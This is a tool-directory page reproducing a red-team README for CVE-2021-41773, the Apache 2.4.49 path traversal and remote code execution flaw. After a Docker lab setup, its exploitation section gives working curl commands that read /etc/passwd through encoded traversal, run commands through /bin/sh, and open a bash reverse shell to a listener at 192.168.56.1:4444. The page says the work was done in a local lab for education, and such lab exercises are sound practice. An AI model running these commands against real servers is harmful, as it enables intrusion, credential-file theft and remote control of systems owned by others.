Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-41773-RedTeam — Apache 2.4.49 Path Traversal RCE | Kitploit
Tools/GitHubGitHub/sobanahmed6061/cve-2021-41773-redteam
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubsobanahmed6061/cve-2021-41773-redteam

CVE-2021-41773-RedTeam

Apache 2.4.49 Path Traversal RCE

View Repository
15 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-41773 — Apache HTTP Server 2.4.49 Path Traversal / RCE

ITSOLERA Cybersecurity Department — Red Team Task #3
Team: Offensive Team Zeta
Date: 18th March 2026


⚠️ Disclaimer

This repository is for educational purposes only.
All testing was performed in an isolated local Docker lab.
Never use against live, production, or third-party systems.


CVE Summary

FieldDetail
CVE IDCVE-2021-41773
CVSS9.8 CRITICAL
AffectedApache HTTP Server 2.4.49 ONLY
TypePath Traversal + Remote Code Execution
Fixed InApache 2.4.51

Repository Contents

FileDescription
poc_41773.pyPython PoC exploit script with Team Zeta banner
docker-compose.ymlVulnerable lab environment setup
offensive_zeta_shell.txtLive session log — proof of exploitation
screenshots/Evidence screenshots
Offensive_Team_Zeta_FINAL_Report.pdfFull exploitation report

Lab Setup

root@kitploit:~
# Pull the vulnerable image
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# Start the lab
docker-compose up -d

# Verify Apache 2.4.49 is running
curl -I http://localhost:8080/
# Must show: Server: Apache/2.4.49

Exploitation

root@kitploit:~
# File read via path traversal
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# Remote code execution
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# Reverse shell (replace IP with your machine IP)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

References

  • https://nvd.nist.gov/vuln/detail/CVE-2021-41773
  • https://www.exploit-db.com/exploits/50383
  • https://httpd.apache.org/security/vulnerabilities_24.html
Download Tool